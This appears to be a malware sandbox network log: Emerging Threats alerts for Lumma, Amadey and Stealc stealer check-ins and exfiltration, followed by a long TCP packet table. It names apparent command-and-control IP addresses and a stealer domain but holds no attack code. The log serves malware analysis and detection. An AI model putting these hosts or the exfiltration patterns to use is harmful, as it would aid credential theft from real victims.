                                                                                                                                                                                                                                                              2024-12-09T23:09:17.108244+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449781104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:17.108244+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449781104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:17.213328+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449787185.215.113.4380TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:18.382928+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.449790104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:18.382928+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449790104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:18.678022+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449791185.215.113.1680TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:19.122038+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449790104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:19.122038+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449790104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:20.710128+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.449800104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:20.710128+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449800104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:23.068929+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.449806104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:23.068929+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449806104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:23.978093+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449806104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:25.467841+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449813185.215.113.4380TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:25.594206+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449807185.215.113.20680TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:25.602980+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.449814104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:25.602980+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449814104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:26.921965+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449815185.215.113.1680TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:28.738776+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.449821104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:28.738776+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449821104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:29.565343+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.449827104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:29.565343+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449827104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:30.415077+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449827104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:30.415077+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449827104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:31.795277+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.449833104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:31.795277+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449833104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:31.873065+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.449834104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:31.873065+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449834104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:32.484134+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449834104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:32.484134+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449834104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:32.623757+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449835185.215.113.4380TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:34.050106+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.449842104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:34.050106+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449842104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:34.076166+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449838185.215.113.1680TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:36.781266+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.449852104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:36.781266+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449852104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:39.172096+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.449861104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:39.172096+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449861104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:39.884353+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449861104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:40.181977+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.449864104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:40.181977+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449864104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:41.348882+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449868185.215.113.1680TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:42.038474+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449870185.215.113.20680TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:42.735490+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449874185.215.113.4380TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:43.332988+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.449880104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:43.332988+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449880104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:46.291112+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.449897104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:46.291112+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449897104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:47.484483+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.449897104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:48.316325+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.449906104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:48.316325+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449906104.21.48.1443TCP
                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                              Dec 9, 2024 23:07:58.463933945 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                                              Dec 9, 2024 23:08:18.575922012 CET4972380192.168.2.4199.232.210.172
                                                                                                                                                                                                                                                              Dec 9, 2024 23:08:18.695621967 CET8049723199.232.210.172192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:08:18.695682049 CET4972380192.168.2.4199.232.210.172
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:04.291348934 CET4975880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:04.410717964 CET8049758185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:04.410823107 CET4975880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:04.410979986 CET4975880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:04.530726910 CET8049758185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:05.760262012 CET8049758185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:05.760340929 CET4975880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:06.698720932 CET4972480192.168.2.4199.232.210.172
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:06.818586111 CET8049724199.232.210.172192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:06.819924116 CET4972480192.168.2.4199.232.210.172
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:07.277916908 CET4975880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:07.278079987 CET4976480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:07.397413969 CET8049764185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:07.397488117 CET4976480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:07.397635937 CET4976480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:07.397659063 CET8049758185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:07.397715092 CET4975880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:07.516880035 CET8049764185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:08.742427111 CET8049764185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:08.742503881 CET4976480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:08.746618032 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:08.865885973 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:08.866043091 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:08.866079092 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:08.985394955 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.209919930 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.209989071 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.209999084 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.210118055 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.210118055 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.210146904 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.210195065 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.210207939 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.210220098 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.210230112 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.210243940 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.210247040 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.210264921 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.210285902 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.210591078 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.210601091 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.210634947 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.210660934 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.329412937 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.329463959 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.339821100 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.339829922 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.339895010 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.401949883 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.402019978 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.402044058 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.402086973 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.406153917 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.406203032 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.406338930 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.406379938 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.414458036 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.414505005 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.414619923 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.414657116 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.422821045 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.422872066 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.422899008 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.422946930 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.431165934 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.431241989 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.431267023 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.431308031 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.439555883 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.439610958 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.439727068 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.439773083 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.447946072 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.447999954 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.448055029 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.448098898 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.456278086 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.456336975 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.456414938 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.456459045 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.464710951 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.464761019 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.464780092 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.464821100 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.473058939 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.473124981 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.473143101 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.473190069 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.481291056 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.481348038 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.575548887 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.575613976 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.575753927 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.575753927 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.579651117 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.579710960 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.595392942 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.595403910 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.595416069 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.595482111 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.595513105 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.595544100 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.595554113 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.600018024 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.600111008 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.600245953 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.600308895 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.604994059 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.605063915 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.605110884 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.605155945 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.609313011 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.609369040 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.609411955 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.609456062 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.613960028 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.614011049 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.614063025 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.614104986 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.618680000 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.618731976 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.618788004 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.618828058 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.626435041 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.626446009 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.626493931 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.626523018 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.629898071 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.629951954 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.630036116 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.630078077 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.636084080 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.636137009 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.636210918 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.636246920 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.639183998 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.639231920 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.639360905 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.639403105 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.641999960 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.642051935 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.642137051 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.642193079 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.646627903 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.646678925 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.646749973 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.646789074 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.651300907 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.651346922 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.651424885 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.651463985 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.656060934 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.656132936 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.656132936 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.656174898 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.660706043 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.660759926 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.660768986 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.660804033 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.665323973 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.665388107 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.665453911 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.665493965 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.670033932 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.670084000 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.670351028 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.670391083 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.674767971 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.674817085 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.674896002 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.674937963 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.767525911 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.767595053 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.767637014 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.767682076 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.769584894 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.769640923 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.769809961 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.769859076 CET4977080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.773528099 CET8049770185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:10.773586988 CET4977080192.168.2.4185.215.113.16
